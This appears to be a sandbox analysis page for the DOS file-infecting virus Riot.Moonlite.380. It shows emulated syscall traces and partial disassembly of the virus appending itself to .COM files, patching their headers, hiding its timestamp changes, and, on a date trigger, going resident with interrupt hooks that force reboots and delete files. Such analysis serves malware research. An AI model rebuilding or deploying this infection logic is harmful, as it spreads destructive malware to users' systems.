Sample viewer

vx.netlux.org/Virus.DOS.Riot.Moonlite.380

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:23:38.196282988Z 26 PC: 12b70 | Set disk transfer address
2018-12-17T22:23:38.197687205Z 78 PC: 12b7b | Find first file
2018-12-17T22:23:38.205104118Z 67 PC: 12b9b | Get or set file attributes
2018-12-17T22:23:38.223098854Z 61 PC: 12ba4 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:23:38.230542647Z 63 PC: 12bb0 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:23:38.235453052Z 66 PC: 12bb8 | Move file pointer
2018-12-17T22:23:38.23695187Z 44 PC: 12bc7 | Get time 0x12bc7: mov word ptr [bp + 0x11d], dx
0x12bcb: call 0x22b39
0x12bce: cdq
0x12bcf: sub cx, cx
0x12bd1: mov ax, 0x4200
0x12bd4: int 0x21
0x12bd6: lea dx, word ptr [bp + 0x27c]
0x12bda: mov cx, 3
0x12bdd: mov ah, 0x40
0x12bdf: int 0x21
0x12be1: mov dx, word ptr [bp + 0x29f]
0x12be5: mov cx, word ptr [bp + 0x29d]
0x12be9: and cl, 0xe0
0x12bec: or cl, 0x15
0x12bef: mov ax, 0x5701
0x12bf2: int 0x21
0x12bf4: mov ah, 0x3e
0x12bf6: int 0x21
0x12bf8: lea dx, word ptr [bp + 0x2a5]
0x12bfc: sub cx, cx
2018-12-17T22:23:38.2391232Z 64 PC: 12b47 | Write file or device (Write 380 bytes on handle 5)
2018-12-17T22:23:38.249678619Z 66 PC: 12bd6 | Move file pointer
2018-12-17T22:23:38.251467567Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:23:38.258860683Z 87 PC: 12bf4 | Get or set file date and time
2018-12-17T22:23:38.261100504Z 62 PC: 12bf8 | Close file
2018-12-17T22:23:38.272165639Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T22:23:38.284263639Z 79 PC: 12b7b | Find next file
2018-12-17T22:23:38.287699878Z 67 PC: 12b9b | Get or set file attributes
2018-12-17T22:23:38.308670063Z 61 PC: 12ba4 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:23:38.316250973Z 63 PC: 12bb0 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:23:38.326403477Z 66 PC: 12bb8 | Move file pointer
2018-12-17T22:23:38.328228957Z 44 PC: 12bc7 | Get time 0x12bc7: mov word ptr [bp + 0x11d], dx
0x12bcb: call 0x22b39
0x12bce: cdq
0x12bcf: sub cx, cx
0x12bd1: mov ax, 0x4200
0x12bd4: int 0x21
0x12bd6: lea dx, word ptr [bp + 0x27c]
0x12bda: mov cx, 3
0x12bdd: mov ah, 0x40
0x12bdf: int 0x21
0x12be1: mov dx, word ptr [bp + 0x29f]
0x12be5: mov cx, word ptr [bp + 0x29d]
0x12be9: and cl, 0xe0
0x12bec: or cl, 0x15
0x12bef: mov ax, 0x5701
0x12bf2: int 0x21
0x12bf4: mov ah, 0x3e
0x12bf6: int 0x21
0x12bf8: lea dx, word ptr [bp + 0x2a5]
0x12bfc: sub cx, cx
2018-12-17T22:23:38.330925676Z 64 PC: 12b47 | Write file or device (Write 380 bytes on handle 5)
2018-12-17T22:23:38.334977831Z 66 PC: 12bd6 | Move file pointer
2018-12-17T22:23:38.336983502Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:23:38.341617926Z 87 PC: 12bf4 | Get or set file date and time
2018-12-17T22:23:38.344096091Z 62 PC: 12bf8 | Close file
2018-12-17T22:23:38.353439613Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T22:23:38.365096039Z 79 PC: 12b7b | Find next file
2018-12-17T22:23:38.368550825Z 67 PC: 12b9b | Get or set file attributes
2018-12-17T22:23:38.380939682Z 61 PC: 12ba4 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:23:38.389254581Z 63 PC: 12bb0 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:23:38.396791111Z 66 PC: 12bb8 | Move file pointer
2018-12-17T22:23:38.399452123Z 44 PC: 12bc7 | Get time 0x12bc7: mov word ptr [bp + 0x11d], dx
0x12bcb: call 0x22b39
0x12bce: cdq
0x12bcf: sub cx, cx
0x12bd1: mov ax, 0x4200
0x12bd4: int 0x21
0x12bd6: lea dx, word ptr [bp + 0x27c]
0x12bda: mov cx, 3
0x12bdd: mov ah, 0x40
0x12bdf: int 0x21
0x12be1: mov dx, word ptr [bp + 0x29f]
0x12be5: mov cx, word ptr [bp + 0x29d]
0x12be9: and cl, 0xe0
0x12bec: or cl, 0x15
0x12bef: mov ax, 0x5701
0x12bf2: int 0x21
0x12bf4: mov ah, 0x3e
0x12bf6: int 0x21
0x12bf8: lea dx, word ptr [bp + 0x2a5]
0x12bfc: sub cx, cx
2018-12-17T22:23:38.402286622Z 64 PC: 12b47 | Write file or device (Write 380 bytes on handle 5)
2018-12-17T22:23:38.405672385Z 66 PC: 12bd6 | Move file pointer
2018-12-17T22:23:38.408091794Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:23:38.411016607Z 87 PC: 12bf4 | Get or set file date and time
2018-12-17T22:23:38.412635159Z 62 PC: 12bf8 | Close file
2018-12-17T22:23:38.422242884Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T22:23:38.433779538Z 79 PC: 12b7b | Find next file
2018-12-17T22:23:38.436482354Z 67 PC: 12b9b | Get or set file attributes
2018-12-17T22:23:38.443620361Z 61 PC: 12ba4 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:23:38.451488313Z 63 PC: 12bb0 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:23:38.458983253Z 66 PC: 12bb8 | Move file pointer
2018-12-17T22:23:38.461770042Z 44 PC: 12bc7 | Get time 0x12bc7: mov word ptr [bp + 0x11d], dx
0x12bcb: call 0x22b39
0x12bce: cdq
0x12bcf: sub cx, cx
0x12bd1: mov ax, 0x4200
0x12bd4: int 0x21
0x12bd6: lea dx, word ptr [bp + 0x27c]
0x12bda: mov cx, 3
0x12bdd: mov ah, 0x40
0x12bdf: int 0x21
0x12be1: mov dx, word ptr [bp + 0x29f]
0x12be5: mov cx, word ptr [bp + 0x29d]
0x12be9: and cl, 0xe0
0x12bec: or cl, 0x15
0x12bef: mov ax, 0x5701
0x12bf2: int 0x21
0x12bf4: mov ah, 0x3e
0x12bf6: int 0x21
0x12bf8: lea dx, word ptr [bp + 0x2a5]
0x12bfc: sub cx, cx
2018-12-17T22:23:38.465119018Z 64 PC: 12b47 | Write file or device (Write 380 bytes on handle 5)
2018-12-17T22:23:38.46871059Z 66 PC: 12bd6 | Move file pointer
2018-12-17T22:23:38.470533818Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:23:38.473662606Z 87 PC: 12bf4 | Get or set file date and time
2018-12-17T22:23:38.475246758Z 62 PC: 12bf8 | Close file
2018-12-17T22:23:38.483848927Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T22:23:38.495109927Z 79 PC: 12b7b | Find next file
2018-12-17T22:23:38.498013527Z 67 PC: 12b9b | Get or set file attributes
2018-12-17T22:23:38.508980223Z 61 PC: 12ba4 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:23:38.528127007Z 63 PC: 12bb0 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:23:38.534963865Z 66 PC: 12bb8 | Move file pointer
2018-12-17T22:23:38.536407268Z 44 PC: 12bc7 | Get time 0x12bc7: mov word ptr [bp + 0x11d], dx
0x12bcb: call 0x22b39
0x12bce: cdq
0x12bcf: sub cx, cx
0x12bd1: mov ax, 0x4200
0x12bd4: int 0x21
0x12bd6: lea dx, word ptr [bp + 0x27c]
0x12bda: mov cx, 3
0x12bdd: mov ah, 0x40
0x12bdf: int 0x21
0x12be1: mov dx, word ptr [bp + 0x29f]
0x12be5: mov cx, word ptr [bp + 0x29d]
0x12be9: and cl, 0xe0
0x12bec: or cl, 0x15
0x12bef: mov ax, 0x5701
0x12bf2: int 0x21
0x12bf4: mov ah, 0x3e
0x12bf6: int 0x21
0x12bf8: lea dx, word ptr [bp + 0x2a5]
0x12bfc: sub cx, cx
2018-12-17T22:23:38.551257978Z 64 PC: 12b47 | Write file or device (Write 380 bytes on handle 5)
2018-12-17T22:23:38.554581795Z 66 PC: 12bd6 | Move file pointer
2018-12-17T22:23:38.556270121Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:23:38.560252488Z 87 PC: 12bf4 | Get or set file date and time
2018-12-17T22:23:38.562353636Z 62 PC: 12bf8 | Close file
2018-12-17T22:23:38.56845086Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T22:23:38.577390913Z 79 PC: 12b7b | Find next file
2018-12-17T22:23:38.580390323Z 67 PC: 12b9b | Get or set file attributes
2018-12-17T22:23:38.586749767Z 61 PC: 12ba4 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:23:38.591148846Z 63 PC: 12bb0 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:23:38.595877535Z 66 PC: 12bb8 | Move file pointer
2018-12-17T22:23:38.596947584Z 44 PC: 12bc7 | Get time 0x12bc7: mov word ptr [bp + 0x11d], dx
0x12bcb: call 0x22b39
0x12bce: cdq
0x12bcf: sub cx, cx
0x12bd1: mov ax, 0x4200
0x12bd4: int 0x21
0x12bd6: lea dx, word ptr [bp + 0x27c]
0x12bda: mov cx, 3
0x12bdd: mov ah, 0x40
0x12bdf: int 0x21
0x12be1: mov dx, word ptr [bp + 0x29f]
0x12be5: mov cx, word ptr [bp + 0x29d]
0x12be9: and cl, 0xe0
0x12bec: or cl, 0x15
0x12bef: mov ax, 0x5701
0x12bf2: int 0x21
0x12bf4: mov ah, 0x3e
0x12bf6: int 0x21
0x12bf8: lea dx, word ptr [bp + 0x2a5]
0x12bfc: sub cx, cx
2018-12-17T22:23:38.598620131Z 64 PC: 12b47 | Write file or device (Write 380 bytes on handle 5)
2018-12-17T22:23:38.604548326Z 66 PC: 12bd6 | Move file pointer
2018-12-17T22:23:38.605634029Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:23:38.610008199Z 87 PC: 12bf4 | Get or set file date and time
2018-12-17T22:23:38.611641842Z 62 PC: 12bf8 | Close file
2018-12-17T22:23:38.61687407Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T22:23:38.62349215Z 79 PC: 12b7b | Find next file
2018-12-17T22:23:38.626931602Z 67 PC: 12b9b | Get or set file attributes
2018-12-17T22:23:38.635399829Z 61 PC: 12ba4 | Open file (Filename = 'PAH.COM')
2018-12-17T22:23:38.643843506Z 63 PC: 12bb0 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:23:38.652800493Z 66 PC: 12bb8 | Move file pointer
2018-12-17T22:23:38.654937229Z 44 PC: 12bc7 | Get time 0x12bc7: mov word ptr [bp + 0x11d], dx
0x12bcb: call 0x22b39
0x12bce: cdq
0x12bcf: sub cx, cx
0x12bd1: mov ax, 0x4200
0x12bd4: int 0x21
0x12bd6: lea dx, word ptr [bp + 0x27c]
0x12bda: mov cx, 3
0x12bdd: mov ah, 0x40
0x12bdf: int 0x21
0x12be1: mov dx, word ptr [bp + 0x29f]
0x12be5: mov cx, word ptr [bp + 0x29d]
0x12be9: and cl, 0xe0
0x12bec: or cl, 0x15
0x12bef: mov ax, 0x5701
0x12bf2: int 0x21
0x12bf4: mov ah, 0x3e
0x12bf6: int 0x21
0x12bf8: lea dx, word ptr [bp + 0x2a5]
0x12bfc: sub cx, cx
2018-12-17T22:23:38.658099341Z 64 PC: 12b47 | Write file or device (Write 380 bytes on handle 5)
2018-12-17T22:23:38.661795668Z 66 PC: 12bd6 | Move file pointer
2018-12-17T22:23:38.663404183Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:23:38.666194265Z 87 PC: 12bf4 | Get or set file date and time
2018-12-17T22:23:38.667756135Z 62 PC: 12bf8 | Close file
2018-12-17T22:23:38.997700096Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T22:23:39.010422249Z 79 PC: 12b7b | Find next file
2018-12-17T22:23:39.013542302Z 67 PC: 12b9b | Get or set file attributes
2018-12-17T22:23:39.025237925Z 61 PC: 12ba4 | Open file (Filename = 'TEST.COM')
2018-12-17T22:23:39.03405643Z 63 PC: 12bb0 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:23:39.041438309Z 66 PC: 12bb8 | Move file pointer
2018-12-17T22:23:39.044202786Z 44 PC: 12bc7 | Get time 0x12bc7: mov word ptr [bp + 0x11d], dx
0x12bcb: call 0x22b39
0x12bce: cdq
0x12bcf: sub cx, cx
0x12bd1: mov ax, 0x4200
0x12bd4: int 0x21
0x12bd6: lea dx, word ptr [bp + 0x27c]
0x12bda: mov cx, 3
0x12bdd: mov ah, 0x40
0x12bdf: int 0x21
0x12be1: mov dx, word ptr [bp + 0x29f]
0x12be5: mov cx, word ptr [bp + 0x29d]
0x12be9: and cl, 0xe0
0x12bec: or cl, 0x15
0x12bef: mov ax, 0x5701
0x12bf2: int 0x21
0x12bf4: mov ah, 0x3e
0x12bf6: int 0x21
0x12bf8: lea dx, word ptr [bp + 0x2a5]
0x12bfc: sub cx, cx
2018-12-17T22:23:39.047208153Z 64 PC: 12b47 | Write file or device (Write 380 bytes on handle 5)
2018-12-17T22:23:39.055588783Z 66 PC: 12bd6 | Move file pointer
2018-12-17T22:23:39.057522622Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:23:39.061270297Z 87 PC: 12bf4 | Get or set file date and time
2018-12-17T22:23:39.063253869Z 62 PC: 12bf8 | Close file
2018-12-17T22:23:39.071718481Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T22:23:39.082963573Z 79 PC: 12b7b | Find next file
2018-12-17T22:23:39.085519319Z 42 PC: 12c0d | Get date 0x12c0d: cmp dl, 1
0x12c10: je 0x12c14
0x12c12: jmp 0x12c7b
0x12c14: mov ah, 9
0x12c16: lea dx, word ptr [bp + 0x25b]
0x12c1a: int 0x21
0x12c1c: jmp 0x12c48
0x12c1e: push ax
0x12c1f: in al, 0x60
0x12c21: cmp al, 0x53
0x12c23: je 0x12c2b
0x12c25: pop ax
0x12c26: ljmp ptr cs:[0x27f]
0x12c2b: ljmp 0xffff:0
0x12c30: iret
0x12c31: cmp ax, 0x4b00
0x12c34: jne 0x12c3a
0x12c36: mov ah, 0x41
0x12c38: int 0x21
0x12c3a: cmp ax, 0x4b9f
2018-12-17T22:23:39.087830486Z 26 PC: 12c84 | Set disk transfer address
2018-12-17T22:23:39.089848405Z 76 PC: 12a5b | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4145,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:51:02.615533164Z 26 PC: 12b70 | Set disk transfer address
2018-12-25T11:51:02.617202686Z 78 PC: 12b7b | Find first file
2018-12-25T11:51:02.623011393Z 67 PC: 12b9b | Get or set file attributes
2018-12-25T11:51:02.637694674Z 61 PC: 12ba4 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:51:02.655920871Z 63 PC: 12bb0 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:51:02.662707782Z 66 PC: 12bb8 | Move file pointer
2018-12-25T11:51:02.663997664Z 44 PC: 12bc7 | Get time 0x12bc7: mov word ptr [bp + 0x11d], dx
0x12bcb: call 0x22b39
0x12bce: cdq
0x12bcf: sub cx, cx
0x12bd1: mov ax, 0x4200
0x12bd4: int 0x21
0x12bd6: lea dx, word ptr [bp + 0x27c]
0x12bda: mov cx, 3
0x12bdd: mov ah, 0x40
0x12bdf: int 0x21
0x12be1: mov dx, word ptr [bp + 0x29f]
0x12be5: mov cx, word ptr [bp + 0x29d]
0x12be9: and cl, 0xe0
0x12bec: or cl, 0x15
0x12bef: mov ax, 0x5701
0x12bf2: int 0x21
0x12bf4: mov ah, 0x3e
0x12bf6: int 0x21
0x12bf8: lea dx, word ptr [bp + 0x2a5]
0x12bfc: sub cx, cx
2018-12-25T11:51:02.666120984Z 64 PC: 12b47 | Write file or device (Write 380 bytes on handle 5)
2018-12-25T11:51:02.68677149Z 66 PC: 12bd6 | Move file pointer
2018-12-25T11:51:02.688378566Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:51:02.695004358Z 87 PC: 12bf4 | Get or set file date and time
2018-12-25T11:51:02.697685848Z 62 PC: 12bf8 | Close file
2018-12-25T11:51:02.705514864Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T11:51:02.720532889Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:02.72443837Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:02.734162587Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:02.740860742Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:02.748260918Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:02.752668804Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:02.75510136Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:02.758547117Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:02.760055299Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:02.762581307Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:02.764067664Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:02.77164108Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:02.781308635Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:02.783923138Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:02.794679679Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:02.801399516Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:02.8074867Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:02.809418267Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:02.812399918Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:02.815800796Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:02.817757979Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:02.820933811Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:02.822920552Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:02.831059119Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:02.840949953Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:02.843560768Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:02.853952207Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:02.861301619Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:02.867762376Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:02.869836326Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:02.872604075Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:02.875581719Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:02.877975087Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:02.880914444Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:02.882454132Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:02.890399158Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:02.900703268Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:02.903261043Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:02.912755109Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:02.919614726Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:02.92615905Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:02.927572782Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:02.930844307Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:02.933931696Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:02.93559001Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:02.939007587Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:02.940714943Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:02.948071843Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:02.959472251Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:02.962219521Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:02.971838376Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:02.979332786Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:02.986108307Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:02.987592886Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:02.990547678Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.001416892Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.003189475Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:03.010802128Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.012655217Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.020870685Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:03.031164543Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.033944856Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:03.043850458Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:03.051294757Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:03.058207527Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:03.059530532Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:03.062183659Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.064936227Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.066159574Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:03.068906102Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.070723149Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.078177639Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:03.087917275Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.090630659Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:03.101950028Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:03.110449821Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:03.117562987Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:03.119280522Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:03.122736292Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.131042686Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.132685248Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:03.135736214Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.137776018Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.14521371Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:03.15491864Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.159570986Z 42 PC: 12c0d | Get date 0x12c0d: cmp dl, 1
0x12c10: je 0x12c14
0x12c12: jmp 0x12c7b
0x12c14: mov ah, 9
0x12c16: lea dx, word ptr [bp + 0x25b]
0x12c1a: int 0x21
0x12c1c: jmp 0x12c48
0x12c1e: push ax
0x12c1f: in al, 0x60
0x12c21: cmp al, 0x53
0x12c23: je 0x12c2b
0x12c25: pop ax
0x12c26: ljmp ptr cs:[0x27f]
0x12c2b: ljmp 0xffff:0
0x12c30: iret
0x12c31: cmp ax, 0x4b00
0x12c34: jne 0x12c3a
0x12c36: mov ah, 0x41
0x12c38: int 0x21
0x12c3a: cmp ax, 0x4b9f
2018-12-25T11:51:03.16167868Z 9 PC: 12c1c | Display string (String= 'Bad command or filename')
2018-12-25T11:51:03.163992578Z 53 PC: 12c4d | Get interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-25T11:51:03.166105357Z 37 PC: 12c5f | Set interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-25T11:51:03.167183634Z 53 PC: 12c64 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:51:03.168500984Z 37 PC: 12c76 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:51:03.170710146Z 49 PC: 12c7b | Terminate and stay resident (Return code = '0' | Memory size = '34')

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4145,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:51:02.749467284Z 26 PC: 12b70 | Set disk transfer address
2018-12-25T11:51:02.751793075Z 78 PC: 12b7b | Find first file
2018-12-25T11:51:02.7598188Z 67 PC: 12b9b | Get or set file attributes
2018-12-25T11:51:02.779106168Z 61 PC: 12ba4 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:51:02.788207247Z 63 PC: 12bb0 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:51:02.799004639Z 66 PC: 12bb8 | Move file pointer
2018-12-25T11:51:02.801040356Z 44 PC: 12bc7 | Get time 0x12bc7: mov word ptr [bp + 0x11d], dx
0x12bcb: call 0x22b39
0x12bce: cdq
0x12bcf: sub cx, cx
0x12bd1: mov ax, 0x4200
0x12bd4: int 0x21
0x12bd6: lea dx, word ptr [bp + 0x27c]
0x12bda: mov cx, 3
0x12bdd: mov ah, 0x40
0x12bdf: int 0x21
0x12be1: mov dx, word ptr [bp + 0x29f]
0x12be5: mov cx, word ptr [bp + 0x29d]
0x12be9: and cl, 0xe0
0x12bec: or cl, 0x15
0x12bef: mov ax, 0x5701
0x12bf2: int 0x21
0x12bf4: mov ah, 0x3e
0x12bf6: int 0x21
0x12bf8: lea dx, word ptr [bp + 0x2a5]
0x12bfc: sub cx, cx
2018-12-25T11:51:02.804443645Z 64 PC: 12b47 | Write file or device (Write 380 bytes on handle 5)
2018-12-25T11:51:02.815437243Z 66 PC: 12bd6 | Move file pointer
2018-12-25T11:51:02.817424265Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:51:02.825744713Z 87 PC: 12bf4 | Get or set file date and time
2018-12-25T11:51:02.829123654Z 62 PC: 12bf8 | Close file
2018-12-25T11:51:02.839039732Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T11:51:02.850689309Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:02.854245768Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:02.865526323Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:02.873354916Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:02.88174517Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:02.883406796Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:02.886119933Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:02.896013591Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:02.897775636Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:02.900856958Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:02.902573906Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:02.911611897Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:02.923459125Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:02.926882914Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:02.939000905Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:02.946457275Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:02.953782492Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:02.957041411Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:02.959727323Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:02.963722775Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:02.966465793Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:02.970083481Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:02.971725995Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:02.981835303Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:02.993138017Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:02.9964822Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:03.008685151Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:03.016178977Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:03.02353044Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:03.025787326Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:03.029408252Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.033119862Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.035131884Z 64 PC: 12be1 | Write file or device (See above)
